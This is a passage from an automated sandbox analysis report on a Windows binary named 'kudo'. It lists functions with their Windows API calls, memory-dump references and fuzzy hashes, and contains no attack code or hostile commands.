                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                      • String ID:
                                                      • API String ID: 1922334811-0
                                                      • Opcode ID: 77aa2d3cf59b1d679bddde9c4191dd7cce3ca711c8441a15cfe8f61714d2bb46
                                                      • Instruction ID: 48760da86bb1e51a9b2fc0d94d90fb6f72c58a7cccda2386822a6aba68b98c43
                                                      • Opcode Fuzzy Hash: 77aa2d3cf59b1d679bddde9c4191dd7cce3ca711c8441a15cfe8f61714d2bb46
                                                      • Instruction Fuzzy Hash: D5118FB2414205AFE718DFA8EC85D6BB7F8FB44715B20852EF855D7252EB30BC448B60
                                                      Function 0085874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00858774
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0085878B
                                                      • FreeSid.ADVAPI32(?), ref: 0085879B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      • Opcode ID: cf7d473e22800c15c01b01bb9e430e523f458dfd94e7f3bb5072bab14546fe4d
                                                      • Instruction ID: 735381fe3e19db2bd4a39814413a4d2b5ea68af15b1f0cdd71845c96c863a654
                                                      • Opcode Fuzzy Hash: cf7d473e22800c15c01b01bb9e430e523f458dfd94e7f3bb5072bab14546fe4d
                                                      • Instruction Fuzzy Hash: D6F04975A1130CBFDF00DFF4DC89AAEBBBCFF08201F1044A9AA01E2182E7756A048B50
                                                      Function 008016DE Relevance: 3.1, APIs: 2, Instructions: 83nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                        • Part of subcall function 008025DB: GetWindowLongW.USER32(?,000000EB), ref: 008025EC
                                                      • GetParent.USER32(?), ref: 0083B7BA
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,008019B3,?,?,?,00000006,?), ref: 0083B834
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$DialogNtdllParentProc_
                                                      • String ID:
                                                      • API String ID: 314495775-0
                                                      • Opcode ID: da22722272e7bd59eeafa1ab012d2951bbcf4fdbf17ca74fe16028d634aba8d5
                                                      • Instruction ID: 1e4e37a4ec4fde9791a32d60d30c5a29119a5f63dda1161b4e481aa8dff4d1c9
                                                      • Opcode Fuzzy Hash: da22722272e7bd59eeafa1ab012d2951bbcf4fdbf17ca74fe16028d634aba8d5
                                                      • Instruction Fuzzy Hash: 04219134201108AFCF608B68CC8DEA93BA6FB49334F584264F629DB2F6C771AD51DB50
                                                      Function 0086C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0086C6FB
                                                      • FindClose.KERNEL32(00000000), ref: 0086C72B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      • Opcode ID: a0528a9ddfe1709863ae602b1bf0c612ff381000ebd44eda423d5ca5491b9b67
                                                      • Instruction ID: 8a0fdc4a2634ef14930bf6fad4660c25e8ce148b992101675bdb3ca9208c939d
                                                      • Opcode Fuzzy Hash: a0528a9ddfe1709863ae602b1bf0c612ff381000ebd44eda423d5ca5491b9b67
                                                      • Instruction Fuzzy Hash: 26113C726006049FDB109F29D845A2AB7E9FF85325F018529F9A9D7391DB30A805CB81
                                                      Function 0088C57D Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0083B93A,?,?,?), ref: 0088C5F1
                                                        • Part of subcall function 008025DB: GetWindowLongW.USER32(?,000000EB), ref: 008025EC
                                                      • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0088C5D7
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                      • String ID:
                                                      • API String ID: 1273190321-0
                                                      • Opcode ID: 8bec316475053d3d638ef343470acedcd2b804b031780980e13e1e55c0f8b697
                                                      • Instruction ID: c1b9238908dc3ffde72391400fbc2b14d37b2aabd376513ca03bf27deae98529
                                                      • Opcode Fuzzy Hash: 8bec316475053d3d638ef343470acedcd2b804b031780980e13e1e55c0f8b697
                                                      • Instruction Fuzzy Hash: 5101B531200604ABCF25AF18CC58E6B3BB6FF85764F140128FA519B2E1CB71B851DB61
                                                      Function 0088C93E Relevance: 3.0, APIs: 2, Instructions: 33nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 0088C961
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0083BA16,?,?,?,?,?), ref: 0088C98A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ClientDialogNtdllProc_Screen
                                                      • String ID:
                                                      • API String ID: 3420055661-0
                                                      • Opcode ID: 6ea3fa103eafba8d82d396e7c09d0ae95d8f6fcdaa4644c2e38f8ac9a1f74769
                                                      • Instruction ID: dadc2692349dba2772377da019fae6109788cfa2c273339b03844fe7526bb1e8
                                                      • Opcode Fuzzy Hash: 6ea3fa103eafba8d82d396e7c09d0ae95d8f6fcdaa4644c2e38f8ac9a1f74769
                                                      • Instruction Fuzzy Hash: 3DF03A7241021CFFEF049F89DC09DAE7FB9FB48321F10416AF915A2162D7716A60EBA4
                                                      Function 0086A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00879468,?,0088FB84,?), ref: 0086A097
                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00879468,?,0088FB84,?), ref: 0086A0A9
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      • Opcode ID: a079448e60c987cd6c395aac040bef9435699a1abe44beb3f1fb02e6b65af09f
                                                      • Instruction ID: bf23352285aeedae19341d3ac168ba832aae1a00b7f97b9f777e8d2c79c315a7
                                                      • Opcode Fuzzy Hash: a079448e60c987cd6c395aac040bef9435699a1abe44beb3f1fb02e6b65af09f
                                                      • Instruction Fuzzy Hash: A4F0823555522DABDB21AFA8CC48FEA776CFF09761F004165FA09D6182DA309940CBA2
                                                      Function 0088CA7C Relevance: 3.0, APIs: 2, Instructions: 23nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0088CA84
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0083B995,?,?,?,?), ref: 0088CAB2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: DialogLongNtdllProc_Window
                                                      • String ID:
                                                      • API String ID: 2065330234-0
                                                      • Opcode ID: 98d69bc231bfd4bbd7e08eb06a108e2822d9cd9f70f452f765cb3ab18317e4a0
                                                      • Instruction ID: fe3717e9c69309139c4d5c9e5fa960b81c783684353a2a7a26ae490c964bd102
                                                      • Opcode Fuzzy Hash: 98d69bc231bfd4bbd7e08eb06a108e2822d9cd9f70f452f765cb3ab18317e4a0
                                                      • Instruction Fuzzy Hash: 82E04F70100218BBEB189F1DDC0AFBA3B58FB04751F408215F966D91E1C6709850D760
                                                      Function 008581CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00858309), ref: 008581E0
                                                      • CloseHandle.KERNEL32(?), ref: 008581F2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                      • String ID:
                                                      • API String ID: 81990902-0
                                                      • Opcode ID: bcae0b71e7daeb8d3711b2189c801f536a74f6ff89878afcd126603d05b9cf54
                                                      • Instruction ID: 7246456f56c7654db3182e62f1818a07d89c254dfbe82a209bf271ceefde72a6
                                                      • Opcode Fuzzy Hash: bcae0b71e7daeb8d3711b2189c801f536a74f6ff89878afcd126603d05b9cf54
                                                      • Instruction Fuzzy Hash: 8EE0BF75010511AFE7252B65FC05D777BA9FB04311715882AB955C4471DB615CD1DB10
                                                      Function 0082A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0082A15A
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0082A163
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 1865c2b6b6885eeb055e851f0a0b15573c89aba65cde44db68e6a83db117d6b0
                                                      • Instruction ID: 1ddf9d8b1f0b6efeb0859587e566aad4cabbdd8946e2e9b3438547630ee469bc
                                                      • Opcode Fuzzy Hash: 1865c2b6b6885eeb055e851f0a0b15573c89aba65cde44db68e6a83db117d6b0
                                                      • Instruction Fuzzy Hash: 0FB09231254308ABCA002B99EC09B883F68FB46AA2F404020F70D84262CB6258508B91
                                                      Function 0080E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Variable must be of type 'Object'., xrefs: 00843E62
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Variable must be of type 'Object'.
                                                      • API String ID: 0-109567571
                                                      • Opcode ID: 3de2b91bc3615b48bd63a70049c836ccc334196a54211396562e3e708025b0dc
                                                      • Instruction ID: d641a92d8e24dbfcfec89a9105817c11d0c3885eb7e81b0f53b0ca0f56fe85bc
                                                      • Opcode Fuzzy Hash: 3de2b91bc3615b48bd63a70049c836ccc334196a54211396562e3e708025b0dc
                                                      • Instruction Fuzzy Hash: 2BA2D074A00219CFCB64CF58C880AAEB7B2FF58314F248869E905EB391D775ED42CB91
                                                      Function 0082F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b5e6fa977b3c55e02b052f4dc7bf88585d3aaec2e3c7cd5b7484c6bb752e348a
                                                      • Instruction ID: 6607cb48d4bb659cfdb11a188b8d8209c6c79a682c5c41722e45dba70d98f236
                                                      • Opcode Fuzzy Hash: b5e6fa977b3c55e02b052f4dc7bf88585d3aaec2e3c7cd5b7484c6bb752e348a
                                                      • Instruction Fuzzy Hash: 6932E221D29F554DD723A634D822335A698FFB73D4F19D737E81AB5AA6EB28C4C38100
                                                      Function 0083242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 045992c5ddb4c489394dcc3c6b0f9803a1318a603a457f05ce1cf5c95c477505
                                                      • Instruction ID: 3c107766d4235aa3cd09100f4566fba753122c16381995604576549c6e207ce1
                                                      • Opcode Fuzzy Hash: 045992c5ddb4c489394dcc3c6b0f9803a1318a603a457f05ce1cf5c95c477505
                                                      • Instruction Fuzzy Hash: C3B1F020E2AF414DD723A6398831336BA5CBFBB2C5F55D71BFC1670E22EB2185835181
                                                      Function 00868889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __time64.LIBCMT ref: 0086889B
                                                        • Part of subcall function 0082520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00868F6E,00000000,?,?,?,?,0086911F,00000000,?), ref: 00825213
                                                        • Part of subcall function 0082520A: __aulldiv.LIBCMT ref: 00825233
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                      • String ID:
                                                      • API String ID: 2893107130-0
                                                      • Opcode ID: 0608a9b21673d2f17a13338c98272b1d03c722053b041199a426bf82ef6a3dc0
                                                      • Instruction ID: ed7dcae31f2043c1f7f73f4361685b986e75d8a806930d1171a8d63bd80bf30a
                                                      • Opcode Fuzzy Hash: 0608a9b21673d2f17a13338c98272b1d03c722053b041199a426bf82ef6a3dc0
                                                      • Instruction Fuzzy Hash: 0F21AF32625610CFC729CF29D841A52B3E1FBA5311B698F7CE1F9CB2C0DA34A905CB54
                                                      Function 0088D78C Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 0088D838
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
